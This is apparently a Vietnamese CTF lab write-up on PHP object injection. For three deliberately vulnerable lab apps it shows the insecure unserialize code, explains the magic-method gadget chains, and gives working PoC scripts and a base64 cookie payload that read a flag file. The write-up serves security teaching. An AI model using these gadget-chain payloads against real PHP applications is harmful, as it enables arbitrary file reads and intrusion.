Home PHP Object Injection BlueCyber
Post
Cancel

PHP Object Injection BlueCyber

PHP Object Injection BlueCyber


Lab1

Source code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
<?php
include 'flag.php';
class pkshow
{

  function echo_name()
  {
    return "Pk very safe^.^";
  }
}

class acp
{

  protected $cinder;
  public $neutron;
  public $nova;
  function __construct()
  {

    $this->cinder = new pkshow;
  }
  function __toString()
  {

    if (isset($this->cinder))
      return $this->cinder->echo_name();
  }
}

class ace
{

  public $filename;
  public $openstack;
  public $docker;
  function echo_name()
  {

    $this->openstack = unserialize($this->docker);
    if($this->openstack->neutron === $this->openstack->nova)
    {

    $file = "./{$this->filename}";
      if (file_get_contents($file))
      {

        return file_get_contents($file);
      }
      else
      {

        return "keystone lost~";
      }
    }
  }
}

if (isset($_GET['pks']))
{

  $logData = unserialize($_GET['pks']);
  echo $logData;
}
else
{

  highlight_file(__file__);
}
?>

Trang web nhận tham số đầu vào pks theo phương thức GET và tiến hành unserialize. Ý tưởng ở đây là tùy chỉnh giá trị tham số pks để đọc được nội dung file flag.php chứa flag.

Untitled

Ở magic method __construct(), biến cinder đã được khởi tạo là 1 đối tượng thuộc lớp pkshow có phương thức echo_name() để in ra 1 chuỗi

Untitled

Ta quan tâm đến magic method __toString() sẽ gọi phương thức echo_name() của biến cinder nếu biến cinder đã được khởi tạo

Untitled

Tiếp tục quan sát source code, ta thấy class ace có phương thức có cùng tên ( echo_name() ) sẽ in ra nội dung của 1 file nếu điều kiện if thỏa mãn

Untitled

Hướng giải quyết: Gán thuộc tính cinder của class acp bằng 1 đối tượng thuộc class ace, magic method __toString() của class acp sẽ trigger hàm echo_name() để in ra nội dung file tùy ý do người dùng cung cấp

Việc cần giải quyết cuối cùng là làm cho câu lệnh điều kiện if đúng để có thể in ra nội dung file

Untitled

Để câu lệnh if luôn đúng, ta sẽ tạo ra một class tmp chứa 2 thuộc tính neutron và nova, sau đó gán cho biến docker một đối tượng thuộc lớp tmp, khi đó câu lệnh if sẽ so sánh 2 giá trị null và luôn trả về true

Untitled

Việc cuối cùng cần làm là gán đường link đến file cần đọc

Untitled

POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
<?php
class acp
{

  protected $cinder;
  public $neutron;
  public $nova;
  function __construct()
  {

    $this->cinder = new ace();
  }
}

class tmp {
  public $neutron;
  public $nova;
}

class ace
{

  public $filename = 'flag.php';
  public $openstack;
  public $docker;

  public function __construct()
  {
   $this->docker = serialize(new tmp());
  }

}

$a = new acp();
// echo "\n";
// echo serialize($a);
echo "\n";
echo(urlencode(serialize($a)));
?>

Flag

Untitled


Lab3

Untitled

Trong file index.php có đoạn code php khởi tạo đối tượng player với tên do người dùng nhập vào, sau đó set cookie hero với giá trị là mã hóa base64 chuỗi serialize của đối tượng player vừa tạo

Untitled

File player.php có đoạn code khai báo class vipPlayer

Untitled

Ở đây ta chú ý đến function GetIcon() sẽ trả về chuỗi mã hóa base64 icon của vũ khí

Check file weaporn.php

Untitled

Magic method __construct() sẽ gán đường dẫn cho thuộc tính fileIcon

Trong file start.php có đoạn code sẽ render ra icon của vũ khí nếu nhân vật có hàng nóng

Untitled

Vector khai thác: lợi dụng magic method __construct() của class weapon và class vipPlayer (vì player không có hàng nóng)

POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
<?php

define('BASE', "./");

class weapon
{
	private $fileIcon;

	function __construct()
	{
		$this->fileIcon = BASE . "Fl4g.php";
	}

	public function GetIcon()
	{
		return file_get_contents($this->fileIcon);
	}

	public function GetMaxDamage()
	{
		return 50;
	}
}

class player
{
	protected $name;
	protected $maxDamage;
	protected $health;

	function __construct($name)
	{
		$this->name = $name;
		$this->health = 100;
		$this->maxDamage = 10;
	}

	public function GetName()
	{
		return $this->name;
	}

	public function GetHealth()
	{
		return $this->health;
	}

	public function SetHealth($health)
	{
		$this->health = $health;
	}

	public function attack()
	{
		return rand(0, $this->maxDamage);
	}

	public function HaveWeapon()
	{
		return false;
	}
}

class vipPlayer extends player
{
	private $weapon;

	function __construct($name)
	{
		$this->name = $name;
		$this->health = 200;
		$this->weapon = new weapon();
		$this->maxDamage = $this->weapon->GetMaxDamage();
	}

	public function GetIcon()
	{
		return base64_encode($this->weapon->GetIcon());
	}

	public function HaveWeapon()
	{
		return true;
	}
}

$a = new vipPlayer("a");
echo base64_encode(serialize($a));
?>

Ta được payload

1
Tzo5OiJ2aXBQbGF5ZXIiOjQ6e3M6MTc6IgB2aXBQbGF5ZXIAd2VhcG9uIjtPOjY6IndlYXBvbiI6MTp7czoxNjoiAHdlYXBvbgBmaWxlSWNvbiI7czoxMDoiLi9GbDRnLnBocCI7fXM6NzoiACoAbmFtZSI7czoxOiJhIjtzOjEyOiIAKgBtYXhEYW1hZ2UiO2k6NTA7czo5OiIAKgBoZWFsdGgiO2k6MjAwO30=

Chặn bắt request với BurpSuite và đổi giá trị cookie hero, có thể thấy player đã có hàng nóng

Untitled

Check ảnh ta có đoạn mã hóa base64

Untitled

Decode được flag

Untitled

Bài này anh Tiến thương các em nên để nguyên file Payload.php rồi =)) mình chỉ phân tích


Lab4

Ta chú ý đến class getFileSystem có magic method __wakeup() (tự động gọi khi unserialize đối tượng) sẽ in ra biến $flag trong file flag.php

Untitled

Class User có magic method __destruct() sẽ check xem tin nhắn người dùng nhập vào có phải chuỗi “Blue7eam” không, nếu có sẽ giải mã base64 chuỗi username người dùng nhập vào và unserialize chuỗi đó

Untitled

Như vậy, chỉ cần nhập đúng chuỗi tin nhắn “Blue7eam” và username là mã hóa base64 của chuỗi serialize đối tượng thuộc class getFileSystem. Khi đó hàm __destruct() tự động gọi khi chương trình kết thúc sẽ dẫn đến hàm __wakeup() của class getFileSystem được thực thi ⇒ in ra flag.

POC

1
2
3
4
5
6
7
8
9
10
<?php
class getFileSystem{
 public function __wakeup(){
   include('flag.php');
   echo $flag;
 }
}
$a = new getFileSystem();
echo serialize($a);
?>

Flag

Untitled

This post is licensed under CC BY 4.0 by the author.

CyberJutsu Upload File Challenge

WhiteHat Play 11 Writeup